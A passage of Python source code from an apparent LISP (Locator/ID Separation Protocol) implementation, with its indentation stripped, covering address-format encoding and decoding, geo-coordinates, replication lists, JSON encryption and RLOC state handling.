if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# if the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
rle_name_str = "({})".format(rle_name_str)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}{}, ".format(addr_str, "" if port == 0 else \
":" + str(port), rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string, encrypted=False, ms_encrypt=False):
self.json_name = name
self.json_string = string
self.json_encrypted = False
#
# Decide to encrypt or decrypt. The map-server encrypts and stores
# ciphertext in mapping system. The lig client decrypts to show user
# data if it has the key in env variable LISP_JSON_KEY. Format of
# env variable is "<key>" or "[<key-id>]<key>".
#
# If the LISP site-eid is not configured to encrypt the JSON than
# store in plaintext.
#
if (len(lisp_ms_json_keys) != 0):
if (ms_encrypt == False): return
self.json_key_id = lisp_ms_json_keys.keys()[0]
self.json_key = lisp_ms_json_keys[self.json_key_id]
self.encrypt_json()
#endif
if (lisp_log_id == "lig" and encrypted):
key = os.getenv("LISP_JSON_KEY")
if (key != None):
index = -1
if (key[0] == "[" and "]" in key):
index = key.find("]")
self.json_key_id = int(key[1:index])
#endif
self.json_key = key[index+1::]
#endif
self.decrypt_json()
#endif
#endif
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
def encrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = jd[key]
value = chacha.ChaCha(ekey, iv).encrypt(value)
jd[key] = binascii.hexlify(value)
#endfor
self.json_string = json.dumps(jd)
self.json_encrypted = True
#enddef
def decrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = binascii.unhexlify(jd[key])
jd[key] = chacha.ChaCha(ekey, iv).encrypt(value)
#endfor
try:
self.json_string = json.dumps(jd)
self.json_encrypted = False
except:
pass
#endtry
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.rloc_probe_latency = "?/?"
self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
self.multicast_rloc_probe_list = {}
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
